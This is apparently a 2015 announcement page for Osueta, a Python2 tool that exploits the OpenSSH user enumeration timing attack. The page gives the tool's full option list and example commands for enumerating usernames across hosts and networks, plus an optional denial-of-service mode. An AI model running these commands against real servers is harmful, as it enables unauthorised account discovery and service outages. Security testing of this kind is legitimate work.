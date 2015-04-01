Osueta - Tool For Exploiting the OpenSSH User Enumeration Timing Attack

Osueta is a simple Python2 script that allows you to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH version 5 to 7.2. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DOS condition in the OpenSSH server.

Usage:

usage: osueta.py [-h] [-H HOST] [-k HFILE] [-f FQDN] [-p PORT] [-L UFILE]
             [-U USER] [-d DELAY] [-v VARI] [-o OUTP] [-l LENGTH]
             [-c VERS] [--dos DOS] [-t THREADS]

OpenSSH User Enumeration Time-Based Attack Python script

optional arguments:
-h, --help  show this help message and exit
-H HOST     Host Ip or CIDR netblock.
-k HFILE    Host list in a file.
-f FQDN     FQDN to attack.
-p PORT     Host port.
-L UFILE    Username list file.
-U USER     Only use a single username.
-d DELAY    Time delay fixed in seconds. If not, delay time is calculated.
-v VARI     Make variations of the username (default yes).
-o OUTP     Output file with positive results.
-l LENGTH   Length of the password in characters (x1000) (default 40).
-c VERS     Check or not the OpenSSH version (default yes).
--dos DOS   Try to make a DOS attack (default no).
-t THREADS  Threads for the DOS attack (default 5).

Examples:

  • A single user enumeration attempt with username variations:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes
  • A single user enumeration attempt with no user variations a dos attack:
./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes
  • Scanning a C class network with only one user:
./osueta -H 192.168.1.0/24 -p 22 -U root -v no
  • Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
./osueta -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


Download Osueta

